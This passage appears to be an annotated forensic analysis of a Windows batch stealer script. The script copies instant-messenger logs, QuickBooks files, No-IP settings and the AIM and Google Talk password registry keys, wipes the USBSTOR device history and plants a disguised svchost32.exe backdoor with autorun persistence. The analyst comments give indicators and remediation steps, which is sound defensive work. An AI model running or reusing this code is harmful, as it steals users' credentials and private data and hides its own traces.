  290. if exist "%PROGRAMFILES%\AIM*" mkdir "%chatlog%\AIM\" && echo AIM found. >> ..\.\Documents\%computername%\%username%.txt
  291. xcopy "%USERPROFILE%\My Documents\My AIM Logs\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
  292. xcopy "%APPDATA%\JAMS\*" "%chatlog%\AIM\*" /s /c /q /r /h /y
  293. xcopy "%APPDATA%\Mirc\logs\*.log" "%chatlog%\Mirc\*" /s /c /q /r /h /y
  294. xcopy "%APPDATA%\MySpace*\IM\Logs\*" "%chatlog%\MySpace\*" /s /c /q /r /h /y
  295. xcopy "%APPDATA%\Skype\*" "%chatlog%\Skype\*" /s /c /q /r /h /y
  296. xcopy "%programfiles%\Trillian\users\default\logs\*.log" "%chatlog%\Trilian\" /s /c /q /r /h /y
  297. xcopy "%programfiles%\Yahoo!\Messenger\Profiles\*" "%chatlog%\Yahoo!\" /s /c /q /r /h /y
  298. xcopy "%APPDATA%\Miranda\*" "%chatlog%\Miranda\*" /s /c /q /r /h /y
  299. xcopy "%APPDATA%\*gaim\*.txt" "%chatlog%\Gaim\" /s /c /q /r /h /y
  300. xcopy "%APPDATA%\*gaim\*.xml" "%chatlog%\Gaim\" /s /c /q /r /h /y
  301. xcopy "%USERPROFILE%\My Documents\ICQ Lite\*" "%chatlog%\ICQ\*" /s /c /q /r /h /y
  302. xcopy "%APPDATA%\.purple\*" "%chatlog%\Pidgin\*" /s /c /q /r /h /y
  303. xcopy "%APPDATA%\Xfire\chatlog\*.*" "%Chatlog%\xfire\*.*" /s /c /q /r /h /y
  304. :QB
  305. if exist "..\system\Settings\QBdis.set" goto :noip
  306. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  307. echo -----Dump Quick Books Files----- >> ..\.\Documents\%computername%\%username%.txt
  308. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Financial-data collection: copies QuickBooks-related files from My Documents by
  REM extension (t05, QDB, QDT, QBA, QBB, QBM, QBW, QBX, QBY). The destination here is built from the
  REM drive letter the script itself runs from (the ~d0 modifier), which indicates the staging
  REM folder sits on the launch medium. NOTE(review): presumably a removable drive; confirm from
  REM device-connection evidence on the host.
  309. if exist "%USERPROFILE%\My Documents\*.QB*" MkDir ..\.\Documents\%computername%\QuickBooks
  310. xcopy "%USERPROFILE%\My Documents\*.t05" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  311. xcopy "%USERPROFILE%\My Documents\*.QDB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  312. xcopy "%USERPROFILE%\My Documents\*.QDT" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  313. xcopy "%USERPROFILE%\My Documents\*.QBA" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  314. xcopy "%USERPROFILE%\My Documents\*.QBB" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  315. xcopy "%USERPROFILE%\My Documents\*.QBM" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  316. xcopy "%USERPROFILE%\My Documents\*.QBW" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  317. xcopy "%USERPROFILE%\My Documents\*.QBX" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  318. xcopy "%USERPROFILE%\My Documents\*.QBY" %~d0\Documents\%computername%\QuickBooks\ /c /q /r /h /y
  319. :noip
  320. if exist "..\system\Settings\noipdis.set" goto :aim
  321. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  322. echo -----Dump Registry/Logs Entry No-IP----- >> ..\.\Documents\%computername%\%username%.txt
  323. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Dynamic-DNS client collection: queries the No-IP update client's registry key
  REM (Vitalwerks\DUC) and copies its log files. The ReadMe text shows the intent to load the saved
  REM settings into a No-IP client on another machine.
  REM Response: change the No-IP account password and review the account's host records.
  324. mkdir "..\.\documents\%computername%\NoIP"
  325. reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Vitalwerks\DUC\" >> ..\.\Documents\noip\Import.reg
  326. xcopy "%ProgramFiles%\No-IP\*.log" "..\.\Documents\%computername%\NoIP\*.log" /c /q /r /h /y
  327. echo Use Import.reg and import into registry then startup no-ip program >> ..\.\Documents\noip\ReadMe.txt
  328. :aim
  329. if exist "..\system\Settings\aimdis.set" goto :googletalk
  330. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  331. echo -----Dump Registry Entry AIM Encrypted ----- >> ..\.\Documents\%computername%\%username%.txt
  332. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Read-only query of the current user's AIM6 Passwords registry key, which the
  REM script's banner describes as encrypted. Reset the AIM password for any affected profile.
  333. reg query "HKEY_CURRENT_USER\Software\America Online\AIM6\Passwords" >> ..\.\Documents\%computername%\%username%.txt
  334. echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
  335. :googletalk
  336. if exist "..\system\Settings\googletalkdis.set" goto :thumbs
  337. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  338. echo -----Dump Registry Entry Google Talk ----- >> ..\.\Documents\%computername%\%username%.txt
  339. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Read-only query of the current user's Google Talk Accounts registry key; the
  REM output lands in the log. Reset the associated Google account password for affected profiles.
  340. reg query "HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts" >> ..\.\Documents\%computername%\%username%.txt
  341. echo Need Testing. >> ..\.\Documents\%computername%\%username%.txt
  342. :thumbs
  343. if exist "..\system\settings\thumbsdis.set" goto :backdoor
  344. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  345. echo -----Dump Thumbs.db From MyDoc & Desktop ----- >> ..\.\Documents\%computername%\%username%.txt
  346. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Copies thumbs.db thumbnail caches from My Pictures, My Documents and Desktop.
  REM These caches hold small previews of image files, so picture content can leak even when the
  REM image files themselves are not copied.
  347. if exist "%userprofile%\My Documents\thumbs.db" mkdir ..\.\Documents\%computername%\Thumbs
  348. copy /Y "%userprofile%\My Documents\My Pictures\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyPictures.db"
  349. copy /Y "%userprofile%\My Documents\thumbs.db" "..\.\Documents\%computername%\Thumbs\MyDocuments.db"
  350. copy /Y "%userprofile%\Desktop\thumbs.db" "..\.\Documents\%computername%\Thumbs\Desktop.db"
  351. echo note: You can view thumb nail size images of files in current dir by using a program >> ..\.\Documents\thumbs\Tip.txt
  352. if exist "..\system\settings\thumbsdis.set" goto :backdoor
  353. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  354. echo -----Delete USB plugin list ----- >> ..\.\Documents\%computername%\%username%.txt
  355. echo ---------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  REM [analyst note] Anti-forensics: targets the USBSTOR enumeration key, which records USB storage
  REM devices that have been attached, in order to hide that a device was plugged in.
  REM Forensics: do not assume the history is gone. Corroborate with other device-install
  REM artifacts such as the setupapi logs and the MountedDevices key, and alert on reg.exe delete
  REM operations against the Enum subtree.
  356. reg Delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USBSTOR\ /va /f
  357. echo Deleted Recent USB list in registry.
  358. :backdoor
  359. if exist "..\system\Settings\backdoordis.set" goto :end
  REM [analyst note] Persistence and payload drop: copies svchost32.exe and drivers.vbs from the
  REM script's system folder to the root of C:, attempts a Run entry named "Windows Update" that
  REM points at C:\Svchost32.exe, and appends a start line for both files to C:\autoexec.bat.
  REM Indicators taken from these lines: C:\svchost32.exe, C:\drivers.vbs, and a C:\autoexec.bat
  REM containing "start drivers.vbs C:\svchost32.exe". The name imitates the genuine svchost.exe.
  REM NOTE(review): the reg add arguments do not follow reg.exe syntax, so check the Run keys on the
  REM host directly instead of assuming the entry was or was not written.
  360. reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Current\VersionRun "Windows Update"="/"C:\Svchost32.exe"" /y
  361. copy .\system\svchost32.exe C:\svchost32.exe
  362. copy .\system\drivers.vbs C:\drivers.vbs
  363. echo start drivers.vbs C:\svchost32.exe >> autoexec.bat
  364. type autoexec.bat >> C:\autoexec.bat
  365. :end
  366. echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  367. echo -----Time:%date% %time%----- >> ..\.\Documents\%computername%\%username%.txt
  368. echo ----------------------------------------------------------------------------------------------------------------------------- >> ..\.\Documents\%computername%\%username%.txt
  369. exit